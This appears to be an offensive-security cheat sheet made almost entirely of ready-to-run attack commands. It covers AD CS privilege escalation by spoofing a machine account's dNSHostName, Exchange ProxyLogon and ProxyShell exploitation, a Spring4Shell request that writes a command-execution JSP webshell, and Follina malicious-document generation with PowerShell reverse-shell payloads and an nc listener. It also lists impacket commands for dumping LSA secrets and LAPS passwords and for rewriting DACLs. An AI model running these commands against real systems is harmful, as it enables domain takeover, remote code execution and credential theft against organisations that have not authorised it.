AD CS Machine Account Privilege Escalation via dNSHostName spoofing
# Add new machine account
impacket-addcomputer $domain/$user:$pass -computer-name 'EVILPC$' -computer-pass 'Password123!'
# Change dNSHostName to DC
python3 bloodyAD.py -d $domain -u $user -p $pass --host $rhost set object 'EVILPC$' dNSHostName -v 'DC01.$domain'
# Request certificate as DC
certipy req -u 'EVILPC$'@$domain -p 'Password123!' -ca 'CA-NAME' -template 'Machine' -dc-ip $rhost
# Authenticate and get hash
certipy auth -pfx dc01.pfx -dc-ip $rhost
Exchange Server SSRF to RCE - Pre-auth remote code execution
# Check vulnerability
curl -k -s "https://$rhost/owa/auth/x.js" -I | grep -i 'x-owa-version'
nmap -p 443 --script "http-vuln-cve2021-26855" $rhost
# Clone and exploit
git clone https://github.com/hausec/ProxyLogon && cd ProxyLogon && python3 proxylogon.py -t $rhost -e admin@$domain
# Using Metasploit
msfconsole -q -x "use exploit/windows/http/exchange_proxylogon_rce; set RHOSTS $rhost; set LHOST $lhost; exploit"
Exchange Server Pre-auth RCE via multiple chained vulnerabilities
# Check autodiscover
curl -k -s "https://$rhost/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"
# Clone and exploit
git clone https://github.com/ktecv2000/ProxyShell && cd ProxyShell && python3 exploit.py -t $rhost -e admin@$domain -c "powershell -enc <BASE64_REVSHELL>"
# Using Metasploit
msfconsole -q -x "use exploit/windows/http/exchange_proxyshell_rce; set RHOSTS $rhost; set LHOST $lhost; set EMAIL admin@$domain; exploit"
Spring Framework RCE via data binding to class loader
# Check vulnerability
curl -s "http://$rhost:$rport/?class.module.classLoader.URLs%5B0%5D=0" | grep -i 'error'
# Write webshell (one-liner)
curl -s "http://$rhost:$rport/" -H 'prefix: <%' -H 'suffix: %>//' -H 'c: Runtime' --data 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='
# Execute commands
curl "http://$rhost:$rport/shell.jsp?cmd=id"
# Using Nuclei
nuclei -u http://$rhost:$rport -t cves/2022/CVE-2022-22965.yaml
Microsoft MSDT Remote Code Execution via malicious Office documents
# Clone and generate payload
git clone https://github.com/JohnHammond/msdt-follina && cd msdt-follina && python3 follina.py -r $lport
# Manual payload (ms-msdt)
ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebsowseURL=http://$lhost/payload IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'<BASE64_PAYLOAD>'+[char]34+'))'))))i]&amp; echo 1"# Generate malicious docx
python3 follina.py -m command -c "powershell -e <BASE64_REVSHELL>" -o exploit.docx
# Start listener
nc -lvnp $lport
Demonstrates the AD CS "bad successor" attack path
# Exploit bad successor vulnerability
impacket-badsuccessor -u $user -p '$pass' -d $domain -dc-ip $rhost
Extracts LSA secrets from remote registry hives through MS-RRP
# Extract LSA secrets remotely
impacket-regsecrets $domain/$user:'$pass'@$rhost
Edits local SAM password hashes offline
# Edit SAM hashes
impacket-samedit SAM -hash <new_hash> -user $username
Checks LDAP signing status and LDAPS channel binding status
# Check LDAP security configuration
impacket-checkLDAPStatus $domain/$user:'$pass' -dc-ip $rhost
Extract LAPS passwords from LDAP
impacket-GetLAPSPassword $domain/$user:'$pass' -dc-ip $rhost
Read, write, remove, backup, restore ACEs in DACL
# Read DACL
impacket-dacledit $domain/$user:'$pass' -dc-ip $rhost -target $target_user -action read
# Add GenericAll
impacket-dacledit $domain/$user:'$pass' -dc-ip $rhost -target $target_user -action write -rights FullControl -principal $attacker_user
Abuse WriteOwner to take ownership of objects
impacket-owneredit $domain/$user:'$pass' -dc-ip $rhost -target $target_dn -new-owner $attacker_user
- Buffer Overflow - Binary exploitation fundamentals
- Port Scanning - Service/version identification for CVE discovery
- Linux PrivEsc - Dirty Cow, Dirty Pipe, kernel exploits
- Windows PrivEsc - PrintNightmare, token exploits
- Web Application Analysis - Web CVE discovery
- SQL Injection - Database CVEs
- Tools Index - Searchsploit, Metasploit
- Emergency Commands - Quick exploitation commands